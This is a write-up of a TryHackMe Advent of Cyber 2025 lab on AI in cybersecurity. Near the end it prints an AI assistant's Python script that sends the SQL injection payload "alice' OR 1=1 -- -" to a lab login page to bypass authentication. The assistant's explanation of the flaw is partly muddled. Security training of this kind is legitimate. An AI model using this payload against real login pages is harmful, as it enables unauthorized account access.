AI in Security — old sAInt nick | Advent of Cyber 2025 Day 4 | Writeup

kidnapshadowKidnapshadow -ديسمبر 26, 2025

Access the room: https://tryhackme.com/room/AIforcyber-aoc2025-y9wWQ1zRgB

The lights glimmer and servers hum blissfully at The Best Festival Company (TBFC), melting the snow surrounding the data centre. TBFC has continued its pursuit of AI excellence. After the past two years, they realize that Van Chatty, their in-house chatbot, wasn’t quite meeting their standards.

Unfortunately for the elves at TBFC, they are also not immune to performance metrics. The elves aim to find ways of increasing their velocity; something to manage the tedious, distracting tasks, which allows the elves to do the real magic.

TBFC, adventurous as ever, is trialling their brand new cyber security AI assistant, Van SolveIT, which is capable of helping the elves with all their defensive, offensive, and software needs. They decide to put this flashy technology to use as Christmas approaches, to identify, confirm, and resolve any potential vulnerabilities, before any nay-sayers can.

Overview

This lab explores the dual role of Artificial Intelligence (AI) and Machine Learning (ML) in cybersecurity — both as tools for attackers to automate and scale attacks and as defenders’ allies to enhance detection, investigation, and response.

The scenario is set against the backdrop of cybersecurity threats facing The Best Festival Company (TBFC), illustrating real-world use cases of AI in threat hunting, log analysis, phishing detection, and defensive automation.

Learning Objectives

Understand foundational AI/ML concepts and architectures (LLMs, Transformers).
Learn attacker use of AI to escalate threats and evade defenses
Explore AI-assisted security monitoring and anomaly detection techniques.
Interact with an AI assistant for guided log analysis and cybersecurity investigations.
Familiarize with AI explainability tools like SHAP and LIME for model transparency.

AI in Cyber Security

Artificial intelligence has rapidly become a cornerstone of modern cyber security. Nearly every vendor now touts AI-powered solutions — not just to ride the buzzword wave, but because AI genuinely delivers measurable benefits in this domain.

Defensive Security

AI agents are increasingly deployed in blue-team operations to accelerate detection, investigation, and response. Acting as automated assistants, they continuously process telemetry — logs, network flows, endpoint signals — and enrich alerts with context.

We’re also seeing AI embedded directly into vendor appliances, such as AI-assisted firewalls and intrusion detection systems. Beyond detection, AI enables automated responses: isolating compromised devices, blocking suspicious emails, or flagging unusual login attempts in real time.

Offensive Security

On the red-team side, AI has transformed penetration testing by automating tedious, time-intensive tasks.

Reconnaissance & OSINT: AI streamlines information gathering from public sources.
Data Analysis: It parses noisy scanner outputs and maps attack surfaces with precision.

This frees human pentesters to focus on the nuanced, creative aspects of exploitation and strategy that machines cannot replicate.

AI in Software Development

AI-driven software development can feel unsettling — especially with the rise of “vibe coding” and the risks of insecure code generation. Yet, AI has proven to be a valuable ally in the development lifecycle:

Collaborative Coding: Acting as a virtual colleague, AI helps brainstorm and refine ideas.
Security Testing: AI powers SAST (Static Application Security Testing) and DAST (Dynamic Application Security Testing) scanners, auditing code and applications for vulnerabilities.

Ironically, while AI excels at finding flaws, it still struggles to consistently produce secure code. Its greatest strength lies in augmenting human developers, not replacing them.

Practical

This interactive lab will showcase how AI can be used across three areas of cyber security:

Red: Generate and use an exploit script.
Blue: Analyse web logs of an attack that has occurred.
Software: Analyse source code for vulnerabilities.

Stage 1:

Stage 2:

Van SolveIT AI assistant helped to generate Python scripts for the vulnerabilities within the web application of today’s Advent of Cyber web application.

AI Response: The vulnerability exists because the username field in the login.php script is vulnerable to SQL injection due to the OR clause with a single quote. This allows attackers to include arbitrary text, such as “admin” or “password”, in the username field. The OR clause enables the injection of malicious SQL code, making it easy for attackers to manipulate the database. This is a basic SQL injection attack and serves as an excellent example for teaching students about how such vulnerabilities can be exploited.

HOW TO SAVE THE FILE:
1) Open a terminal or text editor like Sublime Text.
2) Use the command nano script.py to create the file.
3) Paste the Python script into script.py.
4) Save the file with `Ctrl + X` to exit.
5) Run the script using python3 script.py.

The script will automatically display the exploit. Make sure to follow the guidelines and rules outlined in the instructions. If you’re ready to move on, click “Complete Stage to Continue.”

import requests

# Set up the login credentials
username = "alice' OR 1=1 -- -"
password = "test"

# URL to the vulnerable login page
url = "http://MACHINE_IP:5000/login.php"

# Set up the payload (the input)
payload = {
    "username": username,
    "password": password
}

# Send a POST request to the login page with our payload
response = requests.post(url, data=payload)

# Print the response content
print("Response Status Code:", response.status_code)
print("\nResponse Headers:")
for header, value in response.headers.items():
    print(f"  {header}: {value}")
print("\nResponse Body:")
print(response.text)